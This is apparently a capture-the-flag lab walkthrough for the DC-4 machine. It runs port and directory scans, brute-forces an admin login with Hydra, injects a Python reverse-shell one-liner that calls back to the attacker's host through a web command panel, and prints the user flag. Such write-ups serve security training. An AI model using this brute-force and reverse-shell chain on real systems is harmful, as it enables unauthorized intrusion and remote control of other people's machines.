PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.164.195 -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php,html
/command.php (Status: 302) [Size: 704] [--> index.php]
/css (Status: 301) [Size: 170] [--> <http://192.168.164.195/css/>]
/images (Status: 301) [Size: 170] [--> <http://192.168.164.195/images/>]
/index.php (Status: 200) [Size: 506]
/index.php (Status: 200) [Size: 506]
/logout.php (Status: 302) [Size: 163] [--> index.php]
/login.php (Status: 302) [Size: 206] [--> index.php]
Since here it says its an admin login portal, we assume the username will be admin, and we will be trying to brute force the password using the top 1000 password
hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt 192.168.164.195 http-post-form '/login.php:username=^USER^&password=^PASS^:S=command'
┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt 192.168.164.195 http-post-form '/login.php:username=^USER^&password=^PASS^:S=command'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2022-08-12 09:34:15
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking http-post-form://192.168.164.195:80/login.php:username=^USER^&password=^PASS^:S=command
[80][**http-post-form**] host: **192.168.164.195** login: **admin** password: **happy**
1 of 1 target successfully completed, 1 valid password found
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2022-08-12 09:35:23
After login, we have this Command panel
We can do several things
When we intercept using burp suite, we found that the command is pretty straightforward
We will do a Python one liner here, using + symbol to connect all the blank space:
radio=python+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.164",1234));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import+pty;+pty.spawn("/bin/bash")'&submit=Run
And then we are in
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.164] from (UNKNOWN) [192.168.164.195] 46844
www-data@dc-4:/usr/share/nginx/html$ whoami
www-data
<......SNIPPET......>
www-data@dc-4:/home/jim$ cat local.txt
16ff37f259e96bf2e249208138d91ffa